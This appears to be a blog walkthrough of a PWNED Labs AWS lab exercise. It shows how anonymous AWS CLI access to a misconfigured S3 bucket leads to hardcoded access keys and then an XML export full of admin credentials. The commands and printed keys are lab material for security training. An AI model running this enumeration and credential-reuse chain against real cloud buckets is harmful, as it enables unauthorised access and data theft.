S3 Enumeration
Khang Tran
Posted on November 21, 2024
PWNED Labs is a great resource to get your hands dirty with AWS Penetration Testing.
Today, I'll be going through the S3 Enumeration lab showcasing how easy it is to access an S3 bucket!
Scope
It's your first day on the red team, and you've been tasked with examining a website that was found in a phished employee's bookmarks. Check it out and see where it leads! In scope is the company's infrastructure, including cloud services.
Target
We can see that the website uses an S3 bucket called dev.huge-logistics.com for storing static files such as images, CSS and Javascript.
While attempting to access https://s3.amazonaws.com/dev.huge-logistics.com/ and https://s3.amazonaws.com/dev.huge-logistics.com/static/, we get an access denied.
So we can try accessing using the AWS CLI instead.
We specifically use the --no-sign-request
flag.
This flag is synonymous to accessing the bucket anonymously, as you would do if you were trying to access an FTP server that is poorly misconfigured and allowed anonymous sign in.
Basically, we are enumerating the S3 bucket without having to authenticate ourselves.
aws s3 ls s3://dev.huge-logistics.com --no-sign-request
Now that we can see the contents of the bucket, we can try recursive enumeration.
aws s3 ls s3://dev.huge-logistics.com --no-sign-request --recursive
But access is denied.
However, accessing the shared directory works and we find a zip file that we can download.
Khangs-MBP:~ khangtran$ aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
2023-10-16 11:08:33 0
2023-10-16 11:09:01 993 hl_migration_project.zip
Download
aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request
Unzipping the file reveals a PowerShell script
We discover inside the file hardcoded access keys!
Khangs-MBP:~ khangtran$ cat migrate_secrets.ps1
# AWS Configuration
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"
$region = "us-east-1"
# Set up AWS hardcoded credentials
Set-AWSCredentials -AccessKey $accessKey -SecretKey $secretKey
# Set the AWS region
Set-DefaultAWSRegion -Region $region
# Read the secrets from export.xml
[xml]$xmlContent = Get-Content -Path "export.xml"
# Output log file
$logFile = "upload_log.txt"
# Error handling with retry logic
function TryUploadSecret($secretName, $secretValue) {
$retries = 3
while ($retries -gt 0) {
try {
$result = New-SECSecret -Name $secretName -SecretString $secretValue
$logEntry = "Successfully uploaded secret: $secretName with ARN: $($result.ARN)"
Write-Output $logEntry
Add-Content -Path $logFile -Value $logEntry
return $true
} catch {
$retries--
Write-Error "Failed attempt to upload secret: $secretName. Retries left: $retries. Error: $_"
}
}
return $false
}
foreach ($secretNode in $xmlContent.Secrets.Secret) {
# Implementing concurrency using jobs
Start-Job -ScriptBlock {
param($secretName, $secretValue)
TryUploadSecret -secretName $secretName -secretValue $secretValue
} -ArgumentList $secretNode.Name, $secretNode.Value
}
# Wait for all jobs to finish
$jobs = Get-Job
$jobs | Wait-Job
# Retrieve and display job results
$jobs | ForEach-Object {
$result = Receive-Job -Job $_
if (-not $result) {
Write-Error "Failed to upload secret: $($_.Name) after multiple retries."
}
# Clean up the job
Remove-Job -Job $_
}
Write-Output "Batch upload complete!"
# Install-Module -Name AWSPowerShell -Scope CurrentUser -Force
We can reconfigure our AWS CLI with these keys, which should give us further access to the S3 bucket.
But lets first check which region the bucket is created in.
curl -I https://s3.amazonaws.com/dev.huge-logistics.com/
us-east-1
Run
aws configure
And use
- access-key:
AKIA3SFMDAPOWOWKXEHU
- secret-key:
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
Check our identity
aws sts get-caller-identity
This reveals an IAM user pam-test
.
With these credentials, we are able to access the admin directory, but could not download the flag.
But we were able to reveal more files in the migration-files directory.
Download the xml file
aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .
cat test-export.xml
We see even more privileged credentials!
Take note of the AWS IT Admin
credentials.
Output
<?xml version="1.0" encoding="UTF-8"?>
<CredentialsExport>
<!-- Oracle Database Credentials -->
<CredentialEntry>
<ServiceType>Oracle Database</ServiceType>
<Hostname>oracle-db-server02.prod.hl-internal.com</Hostname>
<Username>admin</Username>
<Password>Password123!</Password>
<Notes>Primary Oracle database for the financial application. Ensure strong password policy.</Notes>
</CredentialEntry>
<!-- HP Server Credentials -->
<CredentialEntry>
<ServiceType>HP Server Cluster</ServiceType>
<Hostname>hp-cluster1.prod.hl-internal.com</Hostname>
<Username>root</Username>
<Password>RootPassword456!</Password>
<Notes>HP server cluster for batch jobs. Periodically rotate this password.</Notes>
</CredentialEntry>
<!-- AWS Production Credentials -->
<CredentialEntry>
<ServiceType>AWS IT Admin</ServiceType>
<AccountID>794929857501</AccountID>
<AccessKeyID>AKIA3SFMDAPOQRFWFGCD</AccessKeyID>
<SecretAccessKey>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</SecretAccessKey>
<Notes>AWS credentials for production workloads. Do not share these keys outside of the organization.</Notes>
</CredentialEntry>
<!-- Iron Mountain Backup Portal -->
<CredentialEntry>
<ServiceType>Iron Mountain Backup</ServiceType>
<URL>https://backupportal.ironmountain.com</URL>
<Username>hladmin</Username>
<Password>HLPassword789!</Password>
<Notes>Account used to schedule tape collections and deliveries. Schedule regular password rotations.</Notes>
</CredentialEntry>
<!-- Office 365 Admin Account -->
<CredentialEntry>
<ServiceType>Office 365</ServiceType>
<URL>https://admin.microsoft.com</URL>
<Username>admin@company.onmicrosoft.com</Username>
<Password>O365Password321!</Password>
<Notes>Office 365 global admin account. Use for essential administrative tasks only and enable MFA.</Notes>
</CredentialEntry>
<!-- Jira Admin Account -->
<CredentialEntry>
<ServiceType>Jira</ServiceType>
<URL>https://hugelogistics.atlassian.net</URL>
<Username>jira_admin</Username>
<Password>JiraPassword654!</Password>
<Notes>Jira administrative account. Restrict access and consider using API tokens where possible.</Notes>
</CredentialEntry>
</CredentialsExport>
AWS IT Admin
- Access Key:
AKIA3SFMDAPOQRFWFGCD
- Secret Key:
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
We can now see an export of user credit card information in cleartext!
Posted on November 21, 2024
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.